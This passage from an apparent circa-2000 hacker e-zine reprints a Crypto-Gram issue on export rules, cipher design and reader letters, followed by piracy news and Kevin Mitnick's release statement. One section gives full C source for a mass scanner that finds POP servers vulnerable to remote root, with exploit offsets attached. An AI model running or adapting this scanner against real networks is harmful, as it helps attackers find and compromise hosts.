are shipped to (but not necessarily report end users). * Export of encryption products up to 64 bits in key length is completely liberalized. * "Non-retail" products will require a license for many exports, such as to foreign governments or foreign ISPs and telcos under certain circumstances. * Source code that is "not subject to an express agreement for the payment of a licensing fee or royalty for commercial production or sale of any product developed with the source code" is freely exportable to all but the T-7 terrorist countries. Source code exporters are required to send the Department of Commerce a copy of the code, or a URL, upon publication. Note that posting code on a web site for anonymous download is allowed; you are not required to check that downloaders might be from one of the prohibited countries. One obvious question is: "How does this affect the Bernstein and Karn court cases?" I don't know yet. The free speech concerns are not addressed, but the things that Bernstein and Karn wanted to do are now allowed. We'll have to see what the attorneys think. A more personal question is: "How does this affect the Applied Cryptography source code disks?" Near as I can tell, all I have to do is notify the right people and I can export them. I will do so as soon as I can. Stay tuned. The actual regs (legalese): http://www.eff.com/pub/Privacy/ITAR_export/2000_export_policy/20000112_crypt oexport_regs.html EFF's press release: http://www.eff.com/11300_crypto_release.html Reuters story with BSA and Sun reactions: http://news.excite.com/news/r/000112/19/tech-tech-encryption Reuters story with EFF reaction: http://news.excite.com/news/r/000113/13/tech-tech-encryption AEA reaction press release: http://news.excite.com/news/pr/000112/dc-aea-encryption-reg ACLU and EPIC reaction: http://news.excite.com/news/zd/000113/18/crypto-compromise-a ** *** ***** ******* *********** ************* Counterpane Internet Security News Bruce Schneier profiled in Business Week: http://businessweek.com/cgi-bin/ebiz/ebiz_frame.pl?url=/ebiz/9912/em1229.htm Bruce Schneier is speaking at BlackHat in Singapore, 3-4 April 2000. He'll also be at BlackHat and DefCon in Las Vegas. http://www.blackhat.org http://www.defcon.org Bruce Schneier is speaking at the RSA Conference in San Jose: Tuesday, 18 Jan, 2:00 PM, on the Analyst's Track. I don't know if it made it into the program, but Bruce will be on stage with Matt Blaze, Steve Bellovin, and several other really smart people. ** *** ***** ******* *********** ************* The Doghouse: Netscape Netscape encrypts users' e-mail passwords with a lousy algorithm. If this isn't enough, their comments to the press cement their inclusion in the doghouse: "Chris Saito, the senior director for product management at Netscape, said that the option to save a password locally was included for convenience. Saito added that Netscape didn't use a stronger encryption algorithm to protect passwords so that 'computer experts could still access the information, in case someone forgot their password.'" In other words, they implemented lousy security on purpose. "Netscape's Saito said the company wasn't aware of the vulnerability and added that a 'security fix' would be forthcoming if that vulnerability were proved to exist. If the Javascript vulnerability doesn't exist, a password stealer would have to have physical access to a user's computer to figure out the algorithm." Note the complete ignorance of viruses like Melissa, or Trojan horses like Back Orifice. "Saito noted that Netscape already has numerous safety features, including a Secure Sockets Layer, which enables users to communicate securely with Web servers, and a protocol for encrypting e-mail messages sent." None of which matters if the password is stolen. http://www.zdnet.com/zdnn/stories/news/0,4586,2409537,00.html RST's information: http://www.rstcorp.com/news/bad-crypto.html http://www.rstcorp.com/news/bad-crypto-tech.html ** *** ***** ******* *********** ************* Block and Stream Ciphers Block and stream ciphers both transform a message from plaintext to ciphertext one piece at a time. Block ciphers apply the same transformation to every piece of the message, and typically deal with fairly large pieces of the message (8 bytes, 16 bytes) at a time. Stream ciphers apply a different transformation to each piece of the message, and typically deal with fairly small pieces of the message (1 bit, 1 byte) at a time. Traditionally they have been separate areas of research, but these days they are converging. And if you poke around at the issues a bit, you'll see that they not very different at all. Stream ciphers first. Traditional stream ciphers consist of three standard pieces: an internal state, a next-state function, and a plaintext-to-ciphertext transformation function. The internal state is generally small, maybe a hundred bits, and can be thought of as the key. The next-state function updates the state. The transformation function takes a piece of plaintext, mixes it with the current state, and produces the same size ciphertext. And then the stream cipher goes on to the next piece. The security of this scheme is based on how cryptographically annoying the two functions are. Sometimes just one of the functions is cryptographically annoying. In electronic stream ciphers, a complicated next-state function is usually combined with a simple transformation that takes the low-order bit of the state and XORs it with the plaintext. In rotor machines, such as the German Enigma, the next-state function was a simple stepping of various rotors, and the transformation function was very complicated. Sometimes both are cryptographically complicated. These ciphers could generally operate in two modes, depending on the input into the next-state function. If the only input was the current state, these were called output-feedback (OFB) ciphers. If there was the additional input of the previous ciphertext bit, these were called cipher-feedback (CFB) ciphers. (If you were in the U.S. military, you knew these modes as "key auto-key" (KAK) and "ciphertext auto-key (CTAK), respectively.) And you chose one mode over the other because of error propagation and resynchronization properties. (Applied Cryptography explains all this in detail.) Traditionally, stream cipher algorithms were as simple as possible. These were implemented in hardware, and needed as few gates as possible. They had to be fast. The result was many designs based on simple mathematical functions: e.g., linear feedback shift registers (LFSRs). They were analyzed based on metrics such as linear complexity and correlation immunity. Analysts looked at cycle lengths and various linear and affine approximations. Most U.S. military encryption algorithms, at least the ones in general use in the 1980s and before, are stream ciphers of these sorts. Block ciphers are different. They consist of a single function: one that takes a plaintext block (a 64-bit block size is traditional) and a key and produces a ciphertext block. The NSA calls these ciphers codebooks, and that is an excellent way to think of them. For each key, you can imagine building a table. On the left column is every possible plaintext block; on the right column is every possible ciphertext block. That's the codebook. It would be a large book, 18 billion billion entries for the smallest commonly used block ciphers, so it is easier to just implement the algorithm mathematically -- especially since you need a new book for each key. But in theory, you could implement it as a single table lookup in a very large codebook. Block ciphers can be used simply as codebooks, encrypting each 64-bit block independently (and, in fact, that is called electronic codebook (ECB) mode), but that has a bunch of security problems. An attacker can rearrange blocks, build up a portion of the codebook if he has some known plaintext, etc. So generally block ciphers are implemented in one of several chaining modes. Before listing the block cipher chaining modes, it's worth noticing that a block cipher algorithm can serve as any of the functions needed to build a stream cipher: the next-state function or the output function. And, in fact, that is what block cipher modes are: stream ciphers built using the block cipher as a primitive. A block cipher in output-feedback mode is simply the block cipher used as the next-state function, with the output of the block cipher being the simple output function. A block cipher in cipher-feedback mode is the same thing, with the addition of the ciphertext being fed into the next-state function. A block cipher in counter mode uses the block cipher as the output function, and a simple counter as the next-state function. Cipher block chaining (CBC) is another block-cipher mode; I've seen the NSA call this "cipher-driven codebook" mode. Here the block cipher is part of the plaintext-to-ciphertext transformation function, and the next-state function is simple. For some reason I can't explain, for many years academic research on block ciphers was more practical than research on stream ciphers. There were more concrete algorithm proposals, more concert analysis, and more implementations. While stream cipher research stayed more theoretical, block ciphers were used in security products. (I assume this was the reverse in the military, where stream ciphers were used in products and were the target of operational cryptanalysis resources.) DES's official sanction as a standard helped this, but before DES there was Lucifer. And after DES there was FEAL, Khufu and Khafre, IDEA, Blowfish, CAST, and many more. Recently, stream ciphers underwent something of a renaissance. These new stream ciphers were designed for computers and not for discrete hardware. Instead of producing output a bit at a time, they produced output a byte at a time (like RC4), or 32 bits at a time (like SEAL or WAKE). And they were no longer constrained by a small internal state -- RC4 takes a key and turns it into a 256-byte internal state, SEAL's internal state is even larger -- or tight hardware-based complexity restrictions. Stream ciphers, which used to be lean and mathematical, started looking as ugly and kludgy as block ciphers. And they started appearing in products as well. So, block and stream ciphers are basically the same thing; the difference is primarily a historical accident. You can use a block cipher as a stream cipher, and you can take any stream cipher and turn it into a block cipher. The mode you use depends a lot on the communications medium -- OFB or CBC makes the most sense for computer communications with separate error detection, while CFB worked really well for radio transmissions -- and the algorithm you choose depends mostly on performance, standardization, and popularity. There's even some blurring in modern ciphers. SEAL, a stream cipher, looks a lot like a block cipher in OFB mode. Skipjack, an NSA-designed block cipher, looks very much like a stream cipher. Some new algorithms can be used both as block ciphers and stream ciphers. But stream ciphers should be faster than block ciphers. Currently the fastest block ciphers encrypt data at 18 clock cycles per byte (that's Twofish, the fastest AES submission). The fastest stream ciphers are even faster: RC4 at 9 clock cycles per byte, and SEAL at 4. (I'm using a general 32-bit architecture for comparison; your actual performance may vary somewhat.) I don't believe this is an accident. Stream ciphers can have a large internal state that changes for every output, but block ciphers have to remain the same. RC4 has a large table -- you can think of it as an S-box -- that changes every time there is an output. Most block ciphers also have some kind of S-box, but it remains constant for each encryption with the same key. There's no reason why you can't take a block cipher, Blowfish for example, and tweak it so that the S-boxes modify themselves with every output. If you're using the algorithm in OFB mode, it will still encrypt and decrypt properly. But it will be a lot harder to break for two reasons. One, the internal state is a moving target and it is a lot harder for an attacker to build model of what is going on inside the state. Two, if the plaintext-to-ciphertext transformation is built properly, attacks based on chosen plaintext or chosen ciphertext are impossible. And if it is a lot harder to break a cipher with self-modifying internals, then you can probably get by with fewer rounds, or less complexity, or something. I believe that there is about a factor of ten speed difference between a good block cipher and a good stream cipher. Designing algorithms is very hard, and I don't suggest that people run out and modify every block cipher they see. We're likely to continue to use block ciphers in stream-cipher modes because that's what we're used to, and that's what the AES process is going to give us as a new standard. But further research into stream ciphers, and ways of taking advantage of the inherent properties of stream ciphers, is likely to produce families of algorithms with even better performance. ** *** ***** ******* *********** ************* Comments from Readers From: Markus Kuhn Subject: German smart-card hack The note on "German hackers have succeeded in cracking the Siemens digital signature chip" in the 1999-12-15 CRYPTO-GRAM is wrong. I have been in contact with the German Hacker (Christian Kahlo) behind this story. He discovered that one user of the Siemens SLE44 chip series included in his ROM software a routine that allowed him to upload and execute not only interpreter bytecode, but also raw 8052 assembler instructions. Using this undocumented facility, Christian uploaded a tiny assembler program that dumped the entire ROM of the card. The ROM was investigated, posted on the USENET as a documented disassembler listing in a TeX file and no vulnerabilities were found. Christian also discovered in the ROM that the SLE chips send out the chip type and serial number when the I/O line is held low during a positive reset edge and the following 600-700 clock cycles, which is a perfectly normal feature (comparable to the BIOS power-up message of a PC) that is fully documented in the SLE44 data sheets and that is not security relevant. No smartcard applications were hacked this way, no vulnerability was found in any smartcard application, and definitely no private keys were compromised. All this also has nothing to do with digital signatures. Any news to the contrary is the result of misunderstandings by journalists, who as usual fill in the gaps of the story with their limited technical background knowledge and try to formulate such reports to be more spectacular than the story behind them. The only policy that has been violated here is that Siemens -- like most other smartcard chip producers -- tries to make sure that nobody except big customers can easily get access to smartcard development kits that allow to upload assembler code directly, which might otherwise shorten the learning curve for a microprobing attacker slightly. Users of Siemens chips that allow code uploads are apparently required to use a bytecode interpreter instead. This policy seems to have been ignored secretly by one Siemens customer who left a backdoor in his byte-code interpreter to enable the later upload of high-speed crypto routines that cannot be implemented sufficiently efficient in the bytecode. Christian discovered this, even though he decided *not* publish the details on how he did this or the name of the Siemens customer in whose cards he had discovered this. All he published was a dump of the standard Siemens SLE ROM code (CMS = Chip Management System, comparable to a PC BIOS), a piece of code that had already been known semi-publicly for many years in the pay-TV hacking community from successful microprobing attacks on the SLE44 series. Christian's main contribution is that he has discovered a very nice low-cost assembler-level development kit for some of the SLE smartcards, which used to cost a fortune and an NDA before. This is not the first time that this has happened: Pay-TV smartcards have been shipped before with software that provides for uploads of EEPROM software patches with broken authentication techniques, which has been known and used in the smartcard tampering community for many years. From: anonymous Subject: Re: New U.S. Crypto Export Regulations In CRYPTO-GRAM of December 15, 1999 you wrote about the proposed new U.S. crypto export regulations, and I can agree with everything you said. However, I believe you missed something important: the view FROM the rest of the world. I work in the finance industry in Europe -- Zurich, to be precise -- and have some involvement with security. This industry (a) WILL NOT use U.S. crypto products, and (b) will certainly NOT make any long-term plans or partnerships to do so for U.S. products with consumer content, because (a) the products to date are forced by law to be weak, but more important, (b) the U.S. government can't be trusted. Even if it approved today the export of some products based on strong crypto, everyone knows that this permission could be terminated tomorrow for the same or other products. And everyone also suspects strongly that the U.S. government will in any case force providers to put trap doors into their products. Under the circumstances, the European finance and e-business industries would be have to be crazy to use U.S. crypto-based products. And they're not crazy. To play in this business in the rest of the world, the U.S. will have to have a clear, consistent, and favorable policy, and U.S. companies will have to present products that are demonstrably strong with no trap doors. (I invite you to speculate if this will happen before Hell freezes over.) In the meantime, there are plenty of non-U.S. products to choose from, and banks like UBS, Credit Suisse, Grupo Intesa, Societe General, Deutsche Bank, Generale Bank, Bank Austria, and Barclays are not sitting back anxiously waiting for U.S. products to become available. They're doing business with non-U.S. products that are just fine, thank you. From: "Grawrock, David" Subject: Electronic voting All these comments regarding electronic voting and absentee voting are missing the mark. The State of Oregon has that all elections (except presidential) are done by mail. It's like the entire state is voting absentee. The process is actually pretty painless. You receive your voter pamphlet and then you get your ballot. It has to be in by election day. If you miss the excitement of going to the voting booth there are collection points where you can drop off your filled in ballot. It's really not that hard. The point here is that the state has determined that it is easier (and cheaper) to simply process the entire election via the absentee process. It now becomes a simple step to go from by mail to by electronic voting. All of the arguments regarding coercion must already have been answered (the government always thinks a process through completely). We have elected all sorts of politicians without anyone coming back and reporting problems with coercion. From: Gerry Brown Subject: RE: Absentee Ballots I just checked some figures with a friend who has the data on Absentee Ballots for San Mateo County in California and he has compared it with the San Francisco elections held this week. The percentage of registered voters using absentee ballots is about 13%-15%. But the more astonishing is the fact that 35%-50% of those actually voting are done by absentee ballots. The lower figure is for national elections and the higher side corresponds to local elections. From: "Hillis, Brad" Subject: PKI article--agree and disagree I can't begin to tell you how much I enjoyed your article with Carl Ellison, "Ten Risks of PKI: What You're not Being Told about Public Key." I'm the lead ecommerce attorney for the state of Washington, and we are currently procuring a private PKI vendor to provide digital signatures for state and local government, similar to the federal government ACES procurement. What you say that PKI is not needed for ecommerce to flourish is true. It's a thought I keep having at all the digital signature law presentations I attend, and the theme I had planned to discuss at my March 7 talk in Boston on PKI. One has to keep asking oneself, why do I need a digital signature? What is the opportunity cost of setting up a PKI? (That is, what security improvements could I make if I spent the money on something besides PKI). However, I disagree with this statement in your article: "In other words, under some digital signature laws (e.g., Utah and Washington), if your signing key has been certified by an approved CA, then you are responsible for whatever that private key does. It does not matter who was at the computer keyboard or what virus did the signing; you are legally responsible." The law seems to say that at first reading, but my view of the law is that it sets up a "rebuttable presumption" of non-repudiation. This is the same rule that applies to physical, pen and ink signatures. Your statement reflects the views of some proponents of PKI who overstate the legal force of a "licensed digital signature" under Washington law. But if, in fact, I never applied my digital signature to a document, and I can prove it (e.g., I have an alibi), then I would not be legally responsible. I believe that is the situation in non-PKI electronic signature schemes, where a (paper and manually signed) Electronic Data Interchange Agreement or Trading Partner Agreement will state that all data submitted between the parties carries the same legal force as if it was manually signed. Having found flaws in the PKI-style laws of Washington, Utah and Minnesota, I do not find a great deal of higher or practical intelligence in the more popular electronic signature laws, either. Esignature laws have not proven any more important to ecommerce than PKI digital signature laws, so why are we in such a rush to pass UETA (uniform electronic transaction act)? From: "Carl Ellison" Subject: Re: PKI article--agree and disagree You are correct. However, I believe we still need to warn against the rebuttable presumption of non-repudiation. The keyholder may have no alibi at all. The keyholder may not be aware that his key was misused (e.g., by an attacker who had gained physical or network access to his computer). This is similar to the position people were in in Britain when they were challenging ATM card operations. It took expert witnessing by Ross Anderson to defend some of their claims, and even then it didn't always work. There, too, the presumption was that the cardholder performed any operation when the ATM logs said he did -- whether he did or not. It was up to the cardholder to prove the negative. This gets even worse when the keyholder has his private key on a smartcard in his possession. It's that much harder to convince a jury that you didn't sign, if the merchant or bank can claim that the signing key never left your personal possession. When an attacker has network access to your computer, he doesn't leave a trail. You have no audit record showing the attack. It's your word against the merchant's and you have no evidence to offer on your behalf. You can't even accuse anyone else. You have no idea who to accuse. Meanwhile, your account has been debited until you manage to prove your point (against the presumption that you're lying). When you compare this to credit card purchases, it's radically different. With a credit card, you have not spent anything until you write the check to the credit card company. When or before you write that check, you can challenge a line item and force the merchant to prove that you were in fact the purchaser. At least with my AMEX account, the immediate result is that AMEX removes the item from my statement -- to be reinstated if the merchant is able to prove that I did do the purchase. I have had such challenges go my way once and the other times, I had simply forgotten. In one case, I thought I was being double-billed, but it turns out I had never been billed the first time (many months before). From: Alfred John Menezes Subject: Elliptic Curve Cryptosystems I read with interest your recent article on ECC in the November 15 issue of Crypto-Gram. I agree with most of your statements and comments. Your recommendations were: 1) If you're working in a constrained environment where longer keys just won't fit, consider elliptic curves. 2) If the choice is elliptic curves or no public-key algorithms at all, use elliptic curves. 3) If you don't have performance constraints, use RSA. 4) If you are concerned about security over the decades (and almost no systems are), use RSA. I certainly agree with recommendations 1) and 2) -- ECC certainly cannot be worse than no security at all! Regarding recommendation 3), I think that most environments which call for public-key solutions will have *some* performance constraints. The limiting factor could be an over-burdened web server which needs to sign thousands of outgoing messages per minute, a handheld device which is communicating with a PC, etc. In such scenarios, one should select the public-key method that performs the best in the most constrained environment. If the constraints involve key sizes, bandwidth, power consumption, or speed (for private key operations), then ECC is likely the method of choice over RSA. Finally, I feel that your recommendation that RSA should be used (instead of ECC) in situations where you are concerned with long-term security is a bit unfair. After all, as you state in the postscript to your article, all the analysis you used on the elliptic curve discrete logarithm problem also applies to the integer factorization problem. I propose that applications which do require long-term security should consider using both* RSA and ECC -- by double encrypting a message with RSA and ECC, or by signing a message twice with RSA and ECC. The following are my condensed thoughts on the security and efficiencies of ECC as compared with RSA. They should be considered a supplement to your Crypto-Gram article, and not a replacement of it. http://www.cacr.math.uwaterloo.ca/~ajmeneze/misc/cryptogram-article.html ((This is a good essay, but remember the author's bias. He works for Certicom, and it is in his financial interest for you to believe in elliptic curves. --Bruce)) ** *** ***** ******* *********** ************* CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on computer security and cryptography. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html. Back issues are available on http://www.counterpane.com. Please feel free to forward CRYPTO-GRAM to colleagues and friends who will find it valuable. Permission is granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety. CRYPTO-GRAM is written by Bruce Schneier. Schneier is founder and CTO of Counterpane Internet Security Inc., the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer on computer security and cryptography. Counterpane Internet Security, Inc. is a venture-funded company bringing innovative managed security solutions to the enterprise. http://www.counterpane.com/ Copyright (c) 2000 by Bruce Schneier ISN is sponsored by Security-Focus.COM @HWA 20.0 POPS.C qpop vulnerability scanner by Duro ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* POPScan QPOP/UCB/SCO scanner by duro duro@dorx.net takes list of ip's from stdin The hosts gathered by this scanner are almost 100% vulnerable to a remote root attack. The exploits used to root the vulnerable machines can all be found by searching bugtraq. UCB pop is 100% of the time vulnerable to the qpop exploit (it's a very old version of qpop). The QPOP version is filitered to make sure that non-vulnerable versions do not show up in the scan. Common offsets for the bsd qpop exploit are: 621, 1500, 500, 300, 900, 0 Example usage: ./z0ne -o ac.uk | ./pops > ac.uk.log & would scan ac.uk for vulnerabilities. much help from jsbach */ #include #include #include #include #include int ADMtelnet (u_long, int port); char domain[50]; int NUMCHILDREN = 150, currchilds = 0; /* change numchildren to taste */ char ip[16]; int temp1 = 0; void scan(char *ip); void alrm(void) { return; } main() { while( (fgets(ip, sizeof(ip), stdin)) != NULL) switch(fork()) { case 0: { scan(ip); exit(0); } case -1: { printf("cannot fork so many timez@!@^&\n"); exit(0); break; } default: { currchilds++; if (currchilds > NUMCHILDREN) wait(NULL); break; } } } void scan(char *ip) { char printip[16]; struct sockaddr_in addr; int sockfd; char buf[512]; bzero((struct sockaddr_in *)&addr, sizeof(addr)); sockfd = socket(AF_INET, SOCK_STREAM, 0); addr.sin_addr.s_addr = inet_addr(ip); addr.sin_port = htons(110); addr.sin_family = AF_INET; signal(SIGALRM, alrm); alarm(5); if ( (connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) != -1)) { recv(sockfd, (char *)buf, sizeof(buf), 0); if ( (strstr(buf, "QPOP") ) != NULL && (strstr(buf, "2.5")) == NULL && (strstr(buf, "krb")) == NULL) { checkos(ip,1); } if((strstr(buf, "UCB")) != NULL) checkos(ip,2); if((strstr(buf, "SCO")) != NULL) { strcpy(printip, ip); if ((temp1=strrchr(printip, '\n')) != NULL) bzero(temp1, 1); printf("%s: SCO Unix box running SCO pop.\n",printip); } } return; } // } checkos(char *ip, int spl) { int temp2; char printip[16]; unsigned long temp; temp = inet_addr(ip); temp2 = ADMtelnet(temp, 23); strcpy(printip, ip); if ((temp1=strrchr(printip, '\n')) != NULL) bzero(temp1, 1); if ((temp2 == 1)&&(spl==1)) printf("%s: OpenBSD box running vuln QPOP\n",printip); if ((temp2 == 1)&&(spl==2)) printf("%s: OpenBSD box running vuln UCB pop\n",printip); if ((temp2 == 2)&&(spl==1)) printf("%s: FreeBSD box running vuln QPOP\n",printip); if ((temp2 == 2)&&(spl==2)) printf("%s: FreeBSD box running vuln UCB pop\n",printip); if ((temp2 == 3)&&(spl==1)) printf("%s: BSDi box running vuln QPOP\n",printip); if ((temp2 == 3)&&(spl==2)) printf("%s: BSDi box running vuln UCB pop\n",printip); } int ADMtelnet (u_long ip, int port) { struct sockaddr_in sin; u_char buf[4000]; int dasock, len; int longueur = sizeof (struct sockaddr_in); dasock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); /* gimme a socket */ sin.sin_family = AF_INET; sin.sin_port = htons (port); sin.sin_addr.s_addr = ip; if (connect (dasock, (struct sockaddr *) &sin, longueur) == -1) return (-1); while (1) { memset (buf, 0, sizeof (buf)); if ((len = read (dasock, buf, 1)) <= 0) break; if (*buf == (unsigned int) 255) { read (dasock, (buf + 1), 2); if (*(buf + 1) == (unsigned int) 253 && !(u_char) * (buf + 2)); else if ((u_char) * (buf + 1) == (unsigned int) 253) { *(buf + 1) = 252; write (dasock, buf, 3); } } else { if (*buf != 0) { bzero (buf, sizeof (buf)); read (dasock, buf, sizeof (buf)); usleep(40000); if((strstr(buf, "OpenBSD") != NULL)) return 1; if((strstr(buf, "FreeBSD") != NULL)) return 2; if((strstr(buf, "BSDI") != NULL)) return 3; sleep (1); } } } return 0; } @HWA 21,0 Hackunlimited special birthday free-cdrom offer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by noose http://www.hackunlimited.com/ Would you want to have all the files in Hackunlimited.com in CD, for free of fcourse ? Just send mailto noose@hackunlimited.com The message itself can be empty, just put the Subject to "Free CD" and you are part of our "lottery" :). You have time until 13th of February to send the message. 3 people will win the CD. The winners will be announced at 22th of February. The CD will include all files at http://www.hackunlimited.com + all the files in http://www.hackunlimited.com/raz0r The file list is available here: http://www.hackunlimited.com/cdlist.txt @HWA 22.0 HACK MY SYSTEM! I DARE YA! ~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.securiteam.com/securitynews/_Can_you_break_into_my_system__I_dare_you__.html Title "Can you break into my system? I dare you!" Summary We in Beyond Security believe that the only way to test your security is by trying to break it. But we're not as drastic as one Linux system administrator who took this one step further - he is asking attackers to try and break into a server he is administrating. Details Many administrators have to deal with potentially malicious users having legal accounts on their servers. Universities, ISPs and large companies have to consider the risk that local users, having access to the system as valid users, will sometime try to elevate their privileges. The system administrator of zeus-olympus.yi.org assumes that some of his users are 'evil'. Although he is confident that his Linux system is secured, he would like others to do their best to attack his system. He therefore provided two user accounts that have normal user access to the system, and he allows anyone who wishes to use those accounts and gain entry to the server. Once logged in, the users are free to try and compromise the system's security, with no strings attached. The only 'catch' is that once vulnerability is found, it should be reported immediately, so that the hole can be closed. This offer is extremely unique. There have been 'hacking' contests in the past (usually by commercial companies trying to show that their product is secure), but this is one of the first time that an administrator is offering full access to the machine (using a valid user account) - which of course makes this game much more interesting. Therefore, if you would like to try and break a Linux Redhat machine, join this war game and give it your best shot. Additional information To join the contest, visit http://zeus-olympus.yi.org/ and enter the 'password required' section. The login is: war and the password is game. Upon entering this section, you will receive the account information needed to log into the server. Feel free to give Danny some feedback about his war game: dannyw@mediaone.net. @HWA 23.0 PWA lead member busted by the FBI ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by TRDonJuan http://www.suntimes.com/output/news/ware04.html Software pirating ring cracked by local FBI February 4, 2000 BY LORRAINE FORTE STAFF REPORTER Chicago FBI agents say they have broken up a worldwide ring of software thieves--called the "Pirates with Attitude"--who were distributing thousands of programs, including the yet-unreleased Windows 2000. A tip from an informant in Chicago led to the breakup of "one of the most sophisticated and longest-standing" piracy and hacking rings, according to a complaint filed Thursday in federal court in Chicago. The FBI used the informant's access codes to break into the group's Web site and obtain a roster of the suspects. Robin Rothberg was arrested Thursday at his home in New Chelmsford, Mass., near Boston. Federal officials say he was a founder and key member of the ring, which evaded law enforcement for eight years. He is charged with conspiring to infringe copyright. Three days before Christmas, Rothberg somehow got a copy of Windows 2000--the latest update of the operating system, scheduled to go on sale next month--and uploaded it to the Internet, according to the criminal complaint. Rothberg, an employee of NEC Technologies, accessed the group's Internet site through a Zenith Data Systems computer server in Buffalo Grove, the complaint states. At least two other users allegedly pirated and distributed software through servers in Chicago, at MegsInet Inc. on West Ohio and at Computer Engineers Inc. on North Wacker. Members of the group downloaded software in exchange for uploading other programs, said Assistant U.S. Attorney Lisa Griffin. They might then give away or sell that software. "It was a barter system, with the upshot being that the site itself contained an incredible amount of software," Griffin said. FBI spokesman Ross Rice said the investigation is continuing. Authorities do not yet know the size of the pirating ring, or the monetary value of the thousands of stolen software titles allegedly distributed from the group's WAREZ site, called Sentinel. WAREZ is a term for an Internet site that distributes pirated versions of software. The Sentinel site was launched in April 1996 and was set up so that only authorized users could access it; it was not available to the general public. The group's members were "carefully screened to minimize the risk of detection" and were given specific roles, such as "crackers," who stripped away the copy protection often embedded in commercial software; "couriers," who transferred large volumes of software files from other pirating sites, and "suppliers," who brought in programs from major software companies. Rothberg, according to the complaint, stole at least nine other major Microsoft programs between June and October 1999. Microsoft did not respond Thursday to requests to comment on the case. An industry group, the Business Software Alliance, has said software theft costs 33,000 jobs and $11 billion a year. -=- http://www.bostonherald.com/bostonherald/lonw/comp02042000.htm FBI nabs Chelmsford man in software piracy ring by Andrea Estes Friday, February 4, 2000 Federal officials say they've captured a leader of a worldwide band of e-pirates who surf the cyberseas in search of software plunder. Robin Rothberg, 32, of Chelmsford, is a founding member of Pirates with Attitudes, an international crew that steals popular titles from powerful companies and gives them away to its members for free, the FBI says. The group, snared by FBI agents in Chicago, is sophisticated and devious enough to have sought after software before it hits the shelves, authorities said. In December, FBI agents found Windows 2000 - which still hasn't been released - and Office 2000 premium, a program given to select customers for testing purposes. In all, agents found enough software to fill the memory of 1,200 average-sized personal computer hard drives. Rothberg, who until last week was a notebook software engineer for NEC Computer Services in Acton, was arrested yesterday and charged with conspiracy in U.S. District Court in Boston. Wearing a long ponytail and black leather jacket, he pleaded not guilty and was released without bail. According to an FBI affidavit, Pirates with Attitudes is a highly structured organization with different members assigned different tasks. ``Suppliers'' steal the programs from major software companies. ``Couriers'' deliver the files to PWA and ``crackers'' strip away the security codes that prevent piracy. The group, overseen by a council, screens members to ``minimize the risk of detection by authorities,'' according to an affidavit filed by FBI Special Agent Michael Snyder of Chicago. Rothberg, who is alleged to be a member of the council, was arrested after an informant helped steer Snyder, an MBA and computer expert, through its maze-like system. Agents located PWA's internet site, ``Sentinel,'' which is accessible only to authorized users. ``Members maintain access to PWA's site by providing files, including copyrighted software files obtained from other sources, and in turn are permitted to copy files provided by other users,'' wrote Snyder. ``Using the confidential informant's access codes, FBI agents logged onto Sentinel and viewed a directory listing thousands of copyrighted software titles available for downloading by PWA members,'' he wrote. So far only Rothberg has been arrested. Chicago authorities yesterday said the investigation is continuing. ``In the simplest terms, it's an organization that allowed its members to upload software to a site configured so it could store a substantial amount of software,'' said assistant United States Attorney Lisa Griffin. ``They could then download it into their own computers.'' Members give and take what they wish, officials said. ``It's a two-way street,'' said Randy Sanborn, spokesman for the United States Attorney's Office in the Northern District of Illinois. Officials wouldn't say whether members have to pay anything - such as a membership fee - for the service. Rothberg was downsized out of his job last week when the division he worked for ceased to exist, according to an NEC spokeswoman, who said the company has no plans to investigate Rothberg's job performance. Rothberg asked Magistrate Judge Robert Collings for permission to travel to California today for a job interview. And Rothberg said he had several more planned, his attorney Joseph Savage told Collings. Collings ordered him to stay off his computer except to look for a job, let the FBI spot check his e-mail, and get the court's permission if he wants to travel outside the Bay State. @HWA 24.0 Mitnick's Release Statement ~~~~~~~~~~~~~~~~~~~~~~~~~~~ I debated wether or not to include this in this issue since the news is saturated with Mitnick stories right now (at least they're taking notice) and decided it was valid to include it here in our archives. There are many more articles available on Mitnick, so i've just included his release statement. Check out the sites http://www.freekevin.com/ or http://www.2600.com/ for more info Mitnick's Release Statement: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ January 21, 2000 Kevin Mitnick read the statement shown below upon his release from federal custody in Lompoc, California after nearly 5 years behind bars. Mr. Mitnick is the copyright holder of this statement, and hereby gives permission for limited reuse and republication under the Fair Use doctrine of U.S. Copyright Law. All other rights reserved. Good morning. Thank you all for taking the time to come out to Lompoc today, my first day of freedom in nearly five years. I have a brief statement to read, and I ask that you permit me to read my statement without interruption. First, I'd like to thank the millions of people who have visited the website kevinmitnick.com during my incarceration, and who took the time to show their support for me during the past five years. I relied on their support during the five years I've been incarcerated more than they will ever realize, and I want to thank them all from the bottom of my heart. As many of you know, I've maintained virtually complete silence during my incarceration -- I've refused dozens of requests for interviews from news organizations from around the world, and for very real reasons -- my actions and my life have been manipulated and grossly misrepresented by the media since I was 17, when the Los Angeles Times first violated the custom, if not the law, that prohibits publication of the names of juveniles accused of crimes. The issues involved in my case are far from over, and will continue to affect everyone in this society as the power of the media to define the "villain of the month" continues to increase. You see, my case is about the power of the media to define the playing field, as well as the tilt of that playing field -- it's about the power of the media to define the boundaries of "acceptable discussion" on any particular issue or story. My case is about the extraordinary breach of journalistic ethics as demonstrated by one man, John Markoff, who is a reporter for one of the most powerful media organizations in the world, the New York Times. My case is about the extraordinary actions of Assistant U.S. Attorneys David Schindler and Christopher Painter to obstruct my ability to defend myself at every turn. And, most importantly, my case is about the extraordinary favoritism and deference shown by the federal courts toward federal prosecutors who were determined to win at any cost, and who went as far as holding me in solitary confinement to coerce me into waiving my fundamental Constitutional rights. If we can't depend on the courts to hold prosecutors in check, then whom can we depend on? I've never met Mr. Markoff, and yet Mr. Markoff has literally become 